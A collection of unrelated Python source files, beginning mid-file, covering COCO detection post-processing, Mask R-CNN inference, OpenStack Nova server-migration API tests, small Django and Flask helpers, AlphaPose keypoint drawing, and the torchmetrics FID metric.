cocoDt = cocoGt.loadRes(np.array(detections))
cocoEval = COCOeval(cocoGt, cocoDt, iouType='bbox')
cocoEval.params.imgIds = image_ids
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
result_dict["mAP"] = cocoEval.stats[0]
class PostProcessCocoPt(PostProcessCoco):
"""
Post processing required by ssd-resnet34 / pytorch
"""
def __init__(self,use_inv_map,score_threshold):
super().__init__()
self.use_inv_map = use_inv_map
self.score_threshold = score_threshold
def __call__(self, results, ids, expected=None, result_dict=None):
# results come as:
# detection_boxes,detection_classes,detection_scores
processed_results = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
self.content_ids.append(ids[idx])
processed_results.append([])
detection_boxes = results[0][idx]
detection_classes = results[1][idx]
expected_classes = expected[idx][0]
scores = results[2][idx]
#for detection in range(0, len(expected_classes)):
for detection in range(0, len(scores)):
if scores[detection] < self.score_threshold:
break
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
# comes from model as: 0=xmax 1=ymax 2=xmin 3=ymin
processed_results[idx].append([float(ids[idx]),
box[1], box[0], box[3], box[2],
scores[detection],
float(detection_class)])
self.total += 1
return processed_results
class PostProcessCocoOnnx(PostProcessCoco):
"""
Post processing required by ssd-resnet34 / onnx
"""
def __init__(self):
super().__init__()
def __call__(self, results, ids, expected=None, result_dict=None):
# results come as:
# onnx (from pytorch ssd-resnet34): detection_boxes,detection_classes,detection_scores
processed_results = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
self.content_ids.append(ids[idx])
processed_results.append([])
detection_boxes = results[0][idx]
detection_classes = results[1][idx]
expected_classes = expected[idx][0]
scores = results[2][idx]
for detection in range(0, len(scores)):
if scores[detection] < 0.5:
break
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
# comes from model as: 0=xmax 1=ymax 2=xmin 3=ymin
processed_results[idx].append([float(ids[idx]),
box[1], box[0], box[3], box[2],
scores[detection],
float(detection_class)])
self.total += 1
return processed_results
class PostProcessCocoTf(PostProcessCoco):
"""
Post processing required by ssd-resnet34 / pytorch
"""
def __init__(self):
super().__init__()
self.use_inv_map = True
def __call__(self, results, ids, expected=None, result_dict=None):
# results come as:
# detection_boxes,detection_classes,detection_scores
processed_results = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
self.content_ids.append(ids[idx])
processed_results.append([])
detection_boxes = results[0][idx]
detection_classes = results[1][idx]
expected_classes = expected[idx][0]
scores = results[2][idx]
for detection in range(0, len(scores)):
if scores[detection] < 0.05:
break
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
# comes from model as: 0=xmax 1=ymax 2=xmin 3=ymin
processed_results[idx].append([float(ids[idx]),
box[0], box[1], box[2], box[3],
scores[detection],
float(detection_class)])
self.total += 1
return processed_results
class PostProcessCocoResnext(PostProcessCoco):
"""
Post processing required by ssd-resnext50 / pytorch & onnx
"""
def __init__(self, use_inv_map, score_threshold, height, width, dict_format=True):
"""
Args:
height (int): Height of the input image
width (int): Width of the input image
dict_format (bool): True if the model outputs a dictionary.
False otherwise. Defaults to True.
"""
super().__init__()
self.use_inv_map = use_inv_map
self.score_threshold = score_threshold
self.height = height
self.width = width
self.dict_format = dict_format
def __call__(self, results, ids, expected=None, result_dict=None):
if self.dict_format:
# If the output of the model is in dictionary format. This happens
# for the model ssd-resnext50-pytorch
bboxes_ = [e['boxes'] for e in results]
labels_ = [e['labels'] for e in results]
scores_ = [e['scores'] for e in results]
results = [bboxes_, labels_, scores_]
else:
bboxes_ = [results[0]]
labels_ = [results[1]]
scores_ = [results[2]]
results = [bboxes_, labels_, scores_]
processed_results = []
content_ids = []
# batch size
bs = len(results[0])
for idx in range(0, bs):
content_ids.append(ids[idx])
processed_results.append([])
detection_boxes = results[0][idx]
detection_classes = results[1][idx]
expected_classes = expected[idx][0]
scores = results[2][idx]
for detection in range(0, len(scores)):
if scores[detection] < self.score_threshold:
break
detection_class = int(detection_classes[detection])
if detection_class in expected_classes:
self.good += 1
box = detection_boxes[detection]
# box comes from model as: xmin, ymin, xmax, ymax
# box comes with dimentions in the range of [0, height]
# and [0, width] respectively. It is necesary to scale
# them in the range [0, 1]
processed_results[idx].append(
[
float(ids[idx]),
box[1] / self.height,
box[0] / self.width,
box[3] / self.height,
box[2] / self.width,
scores[detection],
float(detection_class),
]
)
self.total += 1
self.content_ids.extend(content_ids)
return processed_results
|
from django.test.testcases import TestCase
class ProcessBlockchainTest(TestCase):
pass
|
from flask_mail import Message
from flask import render_template
from . import mail
def mail_message(subject,template,to,**kwargs):
sender_email = 'shaggyneils@gmail.com'
email = Message(subject, sender=sender_email, recipients=[to])
email.body= render_template(template + ".txt",**kwargs)
email.html = render_template(template + ".html",**kwargs)
mail.send(email)
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
# Set up custom environment before nearly anything else is imported
# NOTE: this should be the first import (no not reorder)
from maskrcnn_benchmark.utils.env import setup_environment # noqa F401 isort:skip
import argparse
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '3'
import torch
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.engine.inference import inference
from maskrcnn_benchmark.modeling.detector import build_detection_model
from maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer
from maskrcnn_benchmark.utils.collect_env import collect_env_info
from maskrcnn_benchmark.utils.comm import synchronize, get_rank
from maskrcnn_benchmark.utils.logger import setup_logger
from maskrcnn_benchmark.utils.miscellaneous import mkdir
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Inference")
parser.add_argument(
"--config-file",
default="../configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument("--local_rank", type=int, default=0)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
distributed = num_gpus > 1
if distributed:
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(
backend="nccl", init_method="env://"
)
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
save_dir = ""
logger = setup_logger("maskrcnn_benchmark", save_dir, get_rank())
logger.info("Using {} GPUs".format(num_gpus))
logger.info(cfg)
logger.info("Collecting env info (might take some time)")
logger.info("\n" + collect_env_info())
model = build_detection_model(cfg)
model.to(cfg.MODEL.DEVICE)
output_dir = cfg.OUTPUT_DIR
checkpointer = DetectronCheckpointer(cfg, model, save_dir=output_dir)
_ = checkpointer.load(cfg.MODEL.WEIGHT)
iou_types = ("bbox",)
if cfg.MODEL.MASK_ON:
iou_types = iou_types + ("segm",)
output_folders = [None] * len(cfg.DATASETS.TEST)
dataset_names = cfg.DATASETS.TEST
if cfg.OUTPUT_DIR:
for idx, dataset_name in enumerate(dataset_names):
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name)
mkdir(output_folder)
output_folders[idx] = output_folder
data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)
for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):
inference(
model,
data_loader_val,
dataset_name=dataset_name,
iou_types=iou_types,
box_only=cfg.MODEL.RPN_ONLY,
device=cfg.MODEL.DEVICE,
expected_results=cfg.TEST.EXPECTED_RESULTS,
expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
output_folder=output_folder,
)
synchronize()
if __name__ == "__main__":
main()
|
# Copyright 2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import mock
from oslo_utils.fixture import uuidsentinel as uuids
import six
import webob
from nova.api.openstack.compute import server_migrations
from nova import exception
from nova import objects
from nova.objects import base
from nova import test
from nova.tests.unit.api.openstack import fakes
SERVER_UUID = uuids.server_uuid
fake_migrations = [
{
'id': 1234,
'source_node': 'node1',
'dest_node': 'node2',
'source_compute': 'compute1',
'dest_compute': 'compute2',
'dest_host': '1.2.3.4',
'status': 'running',
'instance_uuid': SERVER_UUID,
'old_instance_type_id': 1,
'new_instance_type_id': 2,
'migration_type': 'live-migration',
'hidden': False,
'memory_total': 123456,
'memory_processed': 12345,
'memory_remaining': 111111,
'disk_total': 234567,
'disk_processed': 23456,
'disk_remaining': 211111,
'created_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration1,
'cross_cell_move': False,
},
{
'id': 5678,
'source_node': 'node10',
'dest_node': 'node20',
'source_compute': 'compute10',
'dest_compute': 'compute20',
'dest_host': '5.6.7.8',
'status': 'running',
'instance_uuid': SERVER_UUID,
'old_instance_type_id': 5,
'new_instance_type_id': 6,
'migration_type': 'live-migration',
'hidden': False,
'memory_total': 456789,
'memory_processed': 56789,
'memory_remaining': 400000,
'disk_total': 96789,
'disk_processed': 6789,
'disk_remaining': 90000,
'created_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'updated_at': datetime.datetime(2013, 10, 22, 13, 42, 2),
'deleted_at': None,
'deleted': False,
'uuid': uuids.migration2,
'cross_cell_move': False,
}
]
migrations_obj = base.obj_make_list(
'fake-context',
objects.MigrationList(),
objects.Migration,
fake_migrations)
class ServerMigrationsTestsV21(test.NoDBTestCase):
wsgi_api_version = '2.22'
def setUp(self):
super(ServerMigrationsTestsV21, self).setUp()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version)
self.context = self.req.environ['nova.context']
self.controller = server_migrations.ServerMigrationsController()
self.compute_api = self.controller.compute_api
def test_force_complete_succeeded(self):
@mock.patch.object(self.compute_api, 'live_migrate_force_complete')
@mock.patch.object(self.compute_api, 'get')
def _do_test(compute_api_get, live_migrate_force_complete):
self.controller._force_complete(self.req, '1', '1',
body={'force_complete': None})
live_migrate_force_complete.assert_called_once_with(
self.context, compute_api_get.return_value, '1')
_do_test()
def _test_force_complete_failed_with_exception(self, fake_exc,
expected_exc):
@mock.patch.object(self.compute_api, 'live_migrate_force_complete',
side_effect=fake_exc)
@mock.patch.object(self.compute_api, 'get')
def _do_test(compute_api_get, live_migrate_force_complete):
self.assertRaises(expected_exc,
self.controller._force_complete,
self.req, '1', '1',
body={'force_complete': None})
_do_test()
def test_force_complete_instance_not_migrating(self):
self._test_force_complete_failed_with_exception(
exception.InstanceInvalidState(instance_uuid='', state='',
attr='', method=''),
webob.exc.HTTPConflict)
def test_force_complete_migration_not_found(self):
self._test_force_complete_failed_with_exception(
exception.MigrationNotFoundByStatus(instance_id='', status=''),
webob.exc.HTTPBadRequest)
def test_force_complete_instance_is_locked(self):
self._test_force_complete_failed_with_exception(
exception.InstanceIsLocked(instance_uuid=''),
webob.exc.HTTPConflict)
def test_force_complete_invalid_migration_state(self):
self._test_force_complete_failed_with_exception(
exception.InvalidMigrationState(migration_id='', instance_uuid='',
state='', method=''),
webob.exc.HTTPBadRequest)
def test_force_complete_instance_not_found(self):
self._test_force_complete_failed_with_exception(
exception.InstanceNotFound(instance_id=''),
webob.exc.HTTPNotFound)
def test_force_complete_unexpected_error(self):
self._test_force_complete_failed_with_exception(
exception.NovaException(),
webob.exc.HTTPInternalServerError)
class ServerMigrationsTestsV223(ServerMigrationsTestsV21):
wsgi_api_version = '2.23'
def setUp(self):
super(ServerMigrationsTestsV223, self).setUp()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version,
use_admin_context=True)
self.context = self.req.environ['nova.context']
@mock.patch('nova.compute.api.API.get_migrations_in_progress_by_instance')
@mock.patch('nova.compute.api.API.get')
def test_index(self, m_get_instance, m_get_mig):
migrations = [server_migrations.output(mig) for mig in migrations_obj]
migrations_in_progress = {'migrations': migrations}
for mig in migrations_in_progress['migrations']:
self.assertIn('id', mig)
self.assertNotIn('deleted', mig)
self.assertNotIn('deleted_at', mig)
m_get_mig.return_value = migrations_obj
response = self.controller.index(self.req, SERVER_UUID)
self.assertEqual(migrations_in_progress, response)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get')
def test_index_invalid_instance(self, m_get_instance):
m_get_instance.side_effect = exception.InstanceNotFound(instance_id=1)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index,
self.req, SERVER_UUID)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get_migration_by_id_and_instance')
@mock.patch('nova.compute.api.API.get')
def test_show(self, m_get_instance, m_get_mig):
migrations = [server_migrations.output(mig) for mig in migrations_obj]
m_get_mig.return_value = migrations_obj[0]
response = self.controller.show(self.req, SERVER_UUID,
migrations_obj[0].id)
self.assertEqual(migrations[0], response['migration'])
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get_migration_by_id_and_instance')
@mock.patch('nova.compute.api.API.get')
def test_show_migration_non_progress(self, m_get_instance, m_get_mig):
non_progress_mig = copy.deepcopy(migrations_obj[0])
non_progress_mig.status = "reverted"
m_get_mig.return_value = non_progress_mig
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, SERVER_UUID,
non_progress_mig.id)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get_migration_by_id_and_instance')
@mock.patch('nova.compute.api.API.get')
def test_show_migration_not_live_migration(self, m_get_instance,
m_get_mig):
non_progress_mig = copy.deepcopy(migrations_obj[0])
non_progress_mig.migration_type = "resize"
m_get_mig.return_value = non_progress_mig
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, SERVER_UUID,
non_progress_mig.id)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get_migration_by_id_and_instance')
@mock.patch('nova.compute.api.API.get')
def test_show_migration_not_exist(self, m_get_instance, m_get_mig):
m_get_mig.side_effect = exception.MigrationNotFoundForInstance(
migration_id=migrations_obj[0].id,
instance_id=SERVER_UUID)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, SERVER_UUID,
migrations_obj[0].id)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
@mock.patch('nova.compute.api.API.get')
def test_show_migration_invalid_instance(self, m_get_instance):
m_get_instance.side_effect = exception.InstanceNotFound(instance_id=1)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, SERVER_UUID,
migrations_obj[0].id)
m_get_instance.assert_called_once_with(self.context, SERVER_UUID,
expected_attrs=None,
cell_down_support=False)
class ServerMigrationsTestsV224(ServerMigrationsTestsV21):
wsgi_api_version = '2.24'
def setUp(self):
super(ServerMigrationsTestsV224, self).setUp()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version,
use_admin_context=True)
self.context = self.req.environ['nova.context']
def test_cancel_live_migration_succeeded(self):
@mock.patch.object(self.compute_api, 'live_migrate_abort')
@mock.patch.object(self.compute_api, 'get')
def _do_test(mock_get, mock_abort):
self.controller.delete(self.req, 'server-id', 'migration-id')
mock_abort.assert_called_once_with(self.context,
mock_get.return_value,
'migration-id',
support_abort_in_queue=False)
_do_test()
def _test_cancel_live_migration_failed(self, fake_exc, expected_exc):
@mock.patch.object(self.compute_api, 'live_migrate_abort',
side_effect=fake_exc)
@mock.patch.object(self.compute_api, 'get')
def _do_test(mock_get, mock_abort):
self.assertRaises(expected_exc,
self.controller.delete,
self.req,
'server-id',
'migration-id')
_do_test()
def test_cancel_live_migration_invalid_state(self):
self._test_cancel_live_migration_failed(
exception.InstanceInvalidState(instance_uuid='',
state='',
attr='',
method=''),
webob.exc.HTTPConflict)
def test_cancel_live_migration_migration_not_found(self):
self._test_cancel_live_migration_failed(
exception.MigrationNotFoundForInstance(migration_id='',
instance_id=''),
webob.exc.HTTPNotFound)
def test_cancel_live_migration_invalid_migration_state(self):
self._test_cancel_live_migration_failed(
exception.InvalidMigrationState(migration_id='',
instance_uuid='',
state='',
method=''),
webob.exc.HTTPBadRequest)
def test_cancel_live_migration_instance_not_found(self):
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete,
self.req,
'server-id',
'migration-id')
class ServerMigrationsTestsV265(ServerMigrationsTestsV224):
wsgi_api_version = '2.65'
def test_cancel_live_migration_succeeded(self):
@mock.patch.object(self.compute_api, 'live_migrate_abort')
@mock.patch.object(self.compute_api, 'get')
def _do_test(mock_get, mock_abort):
self.controller.delete(self.req, 'server-id', 1)
mock_abort.assert_called_once_with(self.context,
mock_get.return_value, 1,
support_abort_in_queue=True)
_do_test()
def test_cancel_live_migration_in_queue_not_yet_available(self):
exc = exception.AbortQueuedLiveMigrationNotYetSupported(
migration_id=1, status='queued')
@mock.patch.object(self.compute_api, 'live_migrate_abort',
side_effect=exc)
@mock.patch.object(self.compute_api, 'get')
def _do_test(mock_get, mock_abort):
error = self.assertRaises(webob.exc.HTTPConflict,
self.controller.delete,
self.req, 'server-id', 1)
self.assertIn("Aborting live migration 1 with status queued is "
"not yet supported for this instance.",
six.text_type(error))
mock_abort.assert_called_once_with(self.context,
mock_get.return_value, 1,
support_abort_in_queue=True)
_do_test()
class ServerMigrationsPolicyEnforcementV21(test.NoDBTestCase):
wsgi_api_version = '2.22'
def setUp(self):
super(ServerMigrationsPolicyEnforcementV21, self).setUp()
self.controller = server_migrations.ServerMigrationsController()
self.req = fakes.HTTPRequest.blank('', version=self.wsgi_api_version)
def test_force_complete_policy_failed(self):
rule_name = "os_compute_api:servers:migrations:force_complete"
self.policy.set_rules({rule_name: "project:non_fake"})
body_args = {'force_complete': None}
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller._force_complete, self.req,
fakes.FAKE_UUID, fakes.FAKE_UUID,
body=body_args)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
class ServerMigrationsPolicyEnforcementV223(
ServerMigrationsPolicyEnforcementV21):
wsgi_api_version = '2.23'
def test_migration_index_failed(self):
rule_name = "os_compute_api:servers:migrations:index"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller.index, self.req,
fakes.FAKE_UUID)
self.assertEqual("Policy doesn't allow %s to be performed." %
rule_name, exc.format_message())
def test_migration_show_failed(self):
rule_name = "os_compute_api:servers:migrations:show"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller.show, self.req,
fakes.FAKE_UUID, 1)
self.assertEqual("Policy doesn't allow %s to be performed." %
rule_name, exc.format_message())
class ServerMigrationsPolicyEnforcementV224(
ServerMigrationsPolicyEnforcementV223):
wsgi_api_version = '2.24'
def test_migrate_delete_failed(self):
rule_name = "os_compute_api:servers:migrations:delete"
self.policy.set_rules({rule_name: "project:non_fake"})
self.assertRaises(exception.PolicyNotAuthorized,
self.controller.delete, self.req,
fakes.FAKE_UUID, '10')
|
from django.shortcuts import render
from . import apps
# Create your views here.
def get_home(request):
data = {}
data['news'] = {}
data['weather'] = {}
data['news']['sport1'] = apps.sport1reader()
data['news']['kicker'] = apps.kickerreader()
data['weather']['today'] = apps.weather()
return render(request,'news/news.html',context=data)
|
import json
import cv2
colors = [[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0], [85, 255, 0],
[0, 255, 0], \
[0, 255, 85], [0, 255, 170], [0, 255, 255], [0, 170, 255], [0, 85, 255], [0, 0, 255],
[85, 0, 255], \
[170, 0, 255], [255, 0, 255], [255, 0, 170], [255, 0, 85]]
def get_viable(joints_data):
joints = []
jind = []
for i, ele in enumerate(joints_data):
joints.append((ele[0], ele[1]))
if(ele[2]>0.1):
jind.append(i)
limbs = [0,0,1,2, 0,17,17,5,7,6, 8,17,17,11,13,12,14]
limbe = [1,2,3,4,17, 5, 6,7,9,8,10,11,12,13,15,14,16]
nwlimbs = []
nwlimbe = []
for a, b in zip(limbs, limbe):
if(a in jind and b in jind):
nwlimbs.append(a)
nwlimbe.append(b)
return joints, jind, nwlimbs, nwlimbe
with open('output/alphapose-results.json') as f:
data = json.load(f)
for ele in data:
img = cv2.imread('output/' + ele['image_id'])
array = ele['keypoints']
joints_data = []
for i in range(len(array)//3):
joints_data.append((int(array[3*i]), int(array[3*i+1]), array[3*i+2]))
x = (joints_data[5][0] + joints_data[6][0])/2
y = (joints_data[5][1] + joints_data[6][1])/2
sc = (joints_data[5][2] + joints_data[6][2])/2
joints_data.append((int(x), int(y), sc))
joints, jind, limbs, limbe = get_viable(joints_data)
for i in jind:
cv2.circle(img, joints[i], 6, colors[i], thickness=-1)
for i in range(len(limbs)):
cv2.line(img, (joints[limbs[i]][0], joints[limbs[i]][1]), (joints[limbe[i]][0], joints[limbe[i]][1]), colors[i], thickness=3)
cv2.imwrite('output/' + ele['image_id'], img)
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Callable, List, Optional, Union
import numpy as np
import torch
from deprecate import deprecated, void
from torch import Tensor
from torch.autograd import Function
from torchmetrics.metric import Metric
from torchmetrics.utilities import _future_warning, rank_zero_info, rank_zero_warn
from torchmetrics.utilities.data import dim_zero_cat
from torchmetrics.utilities.imports import _SCIPY_AVAILABLE, _TORCH_FIDELITY_AVAILABLE
if _TORCH_FIDELITY_AVAILABLE:
from torch_fidelity.feature_extractor_inceptionv3 import FeatureExtractorInceptionV3
else:
class FeatureExtractorInceptionV3(torch.nn.Module): # type: ignore
pass
__doctest_skip__ = ["FrechetInceptionDistance", "FID"]
if _SCIPY_AVAILABLE:
import scipy
class NoTrainInceptionV3(FeatureExtractorInceptionV3):
def __init__(
self,
name: str,
features_list: List[str],
feature_extractor_weights_path: Optional[str] = None,
) -> None:
super().__init__(name, features_list, feature_extractor_weights_path)
# put into evaluation mode
self.eval()
def train(self, mode: bool) -> "NoTrainInceptionV3":
"""the inception network should not be able to be switched away from evaluation mode."""
return super().train(False)
def forward(self, x: Tensor) -> Tensor:
out = super().forward(x)
return out[0].reshape(x.shape[0], -1)
class MatrixSquareRoot(Function):
"""Square root of a positive definite matrix.
All credit to: `Square Root of a Positive Definite Matrix`_
"""
@staticmethod
def forward(ctx: Any, input_data: Tensor) -> Tensor:
# TODO: update whenever pytorch gets an matrix square root function
# Issue: https://github.com/pytorch/pytorch/issues/9983
m = input_data.detach().cpu().numpy().astype(np.float_)
scipy_res, _ = scipy.linalg.sqrtm(m, disp=False)
sqrtm = torch.from_numpy(scipy_res.real).to(input_data)
ctx.save_for_backward(sqrtm)
return sqrtm
@staticmethod
def backward(ctx: Any, grad_output: Tensor) -> Tensor:
grad_input = None
if ctx.needs_input_grad[0]:
(sqrtm,) = ctx.saved_tensors
sqrtm = sqrtm.data.cpu().numpy().astype(np.float_)
gm = grad_output.data.cpu().numpy().astype(np.float_)
# Given a positive semi-definite matrix X,
# since X = X^{1/2}X^{1/2}, we can compute the gradient of the
# matrix square root dX^{1/2} by solving the Sylvester equation:
# dX = (d(X^{1/2})X^{1/2} + X^{1/2}(dX^{1/2}).
grad_sqrtm = scipy.linalg.solve_sylvester(sqrtm, sqrtm, gm)
grad_input = torch.from_numpy(grad_sqrtm).to(grad_output)
return grad_input
sqrtm = MatrixSquareRoot.apply
def _compute_fid(mu1: Tensor, sigma1: Tensor, mu2: Tensor, sigma2: Tensor, eps: float = 1e-6) -> Tensor:
r"""
Adjusted version of `Fid Score`_
The Frechet Inception Distance between two multivariate Gaussians X_x ~ N(mu_1, sigm_1)
and X_y ~ N(mu_2, sigm_2) is d^2 = ||mu_1 - mu_2||^2 + Tr(sigm_1 + sigm_2 - 2*sqrt(sigm_1*sigm_2)).
Args:
mu1: mean of activations calculated on predicted (x) samples
sigma1: covariance matrix over activations calculated on predicted (x) samples
mu2: mean of activations calculated on target (y) samples
sigma2: covariance matrix over activations calculated on target (y) samples
eps: offset constant. used if sigma_1 @ sigma_2 matrix is singular
Returns:
Scalar value of the distance between sets.
"""
diff = mu1 - mu2
covmean = sqrtm(sigma1.mm(sigma2))
# Product might be almost singular
if not torch.isfinite(covmean).all():
rank_zero_info(f"FID calculation produces singular product; adding {eps} to diagonal of covariance estimates")
offset = torch.eye(sigma1.size(0), device=mu1.device, dtype=mu1.dtype) * eps
covmean = sqrtm((sigma1 + offset).mm(sigma2 + offset))
tr_covmean = torch.trace(covmean)
return diff.dot(diff) + torch.trace(sigma1) + torch.trace(sigma2) - 2 * tr_covmean
class FrechetInceptionDistance(Metric):
r"""
Calculates Fréchet inception distance (FID_) which is used to access the quality of generated images. Given by
.. math::
FID = |\mu - \mu_w| + tr(\Sigma + \Sigma_w - 2(\Sigma \Sigma_w)^{\frac{1}{2}})
where :math:`\mathcal{N}(\mu, \Sigma)` is the multivariate normal distribution estimated from Inception v3 [1]
features calculated on real life images and :math:`\mathcal{N}(\mu_w, \Sigma_w)` is the multivariate normal
distribution estimated from Inception v3 features calculated on generated (fake) images. The metric was
originally proposed in [1].
Using the default feature extraction (Inception v3 using the original weights from [2]), the input is
expected to be mini-batches of 3-channel RGB images of shape (3 x H x W) with dtype uint8. All images
will be resized to 299 x 299 which is the size of the original training data. The boolian flag ``real``
determines if the images should update the statistics of the real distribution or the fake distribution.
.. note:: using this metrics requires you to have ``scipy`` install. Either install as ``pip install
torchmetrics[image]`` or ``pip install scipy``
.. note:: using this metric with the default feature extractor requires that ``torch-fidelity``
is installed. Either install as ``pip install torchmetrics[image]`` or
``pip install torch-fidelity``
.. note:: the ``forward`` method can be used but ``compute_on_step`` is disabled by default (oppesit of
all other metrics) as this metric does not really make sense to calculate on a single batch. This
means that by default ``forward`` will just call ``update`` underneat.
Args:
feature:
Either an integer or ``nn.Module``:
- an integer will indicate the inceptionv3 feature layer to choose. Can be one of the following:
64, 192, 768, 2048
- an ``nn.Module`` for using a custom feature extractor. Expects that its forward method returns
an ``[N,d]`` matrix where ``N`` is the batch size and ``d`` is the feature size.
compute_on_step:
Forward only calls ``update()`` and return ``None`` if this is set to ``False``.
dist_sync_on_step:
Synchronize metric state across processes at each ``forward()``
before returning the value at the step
process_group:
Specify the process group on which synchronization is called.
default: ``None`` (which selects the entire world)
dist_sync_fn:
Callback that performs the allgather operation on the metric state. When ``None``, DDP
will be used to perform the allgather
References:
[1] Rethinking the Inception Architecture for Computer Vision
Christian Szegedy, Vincent Vanhoucke, Sergey Ioffe, Jonathon Shlens, Zbigniew Wojna
https://arxiv.org/abs/1512.00567
[2] GANs Trained by a Two Time-Scale Update Rule Converge to a Local Nash Equilibrium,
Martin Heusel, Hubert Ramsauer, Thomas Unterthiner, Bernhard Nessler, Sepp Hochreiter
https://arxiv.org/abs/1706.08500
Raises:
ValueError:
If ``feature`` is set to an ``int`` (default settings) and ``torch-fidelity`` is not installed
ValueError:
If ``feature`` is set to an ``int`` not in [64, 192, 768, 2048]
TypeError:
If ``feature`` is not an ``str``, ``int`` or ``torch.nn.Module``
Example:
>>> import torch
>>> _ = torch.manual_seed(123)
>>> from torchmetrics.image.fid import FrechetInceptionDistance
>>> fid = FrechetInceptionDistance(feature=64)
>>> # generate two slightly overlapping image intensity distributions
>>> imgs_dist1 = torch.randint(0, 200, (100, 3, 299, 299), dtype=torch.uint8)
>>> imgs_dist2 = torch.randint(100, 255, (100, 3, 299, 299), dtype=torch.uint8)
>>> fid.update(imgs_dist1, real=True)
>>> fid.update(imgs_dist2, real=False)
>>> fid.compute()
tensor(12.7202)
"""
real_features: List[Tensor]
fake_features: List[Tensor]
higher_is_better = False
def __init__(
self,
feature: Union[int, torch.nn.Module] = 2048,
compute_on_step: bool = False,
dist_sync_on_step: bool = False,
process_group: Optional[Any] = None,
dist_sync_fn: Callable[[Tensor], List[Tensor]] = None,
) -> None:
super().__init__(
compute_on_step=compute_on_step,
dist_sync_on_step=dist_sync_on_step,
process_group=process_group,
dist_sync_fn=dist_sync_fn,
)
rank_zero_warn(
"Metric `FrechetInceptionDistance` will save all extracted features in buffer."
" For large datasets this may lead to large memory footprint.",
UserWarning,
)
if isinstance(feature, int):
if not _TORCH_FIDELITY_AVAILABLE:
raise ModuleNotFoundError(
"FrechetInceptionDistance metric requires that `Torch-fidelity` is installed."
" Either install as `pip install torchmetrics[image]` or `pip install torch-fidelity`."
)
valid_int_input = [64, 192, 768, 2048]
if feature not in valid_int_input:
raise ValueError(
f"Integer input to argument `feature` must be one of {valid_int_input}, but got {feature}."
)
self.inception = NoTrainInceptionV3(name="inception-v3-compat", features_list=[str(feature)])
elif isinstance(feature, torch.nn.Module):
self.inception = feature
else:
raise TypeError("Got unknown input to argument `feature`")
self.add_state("real_features", [], dist_reduce_fx=None)
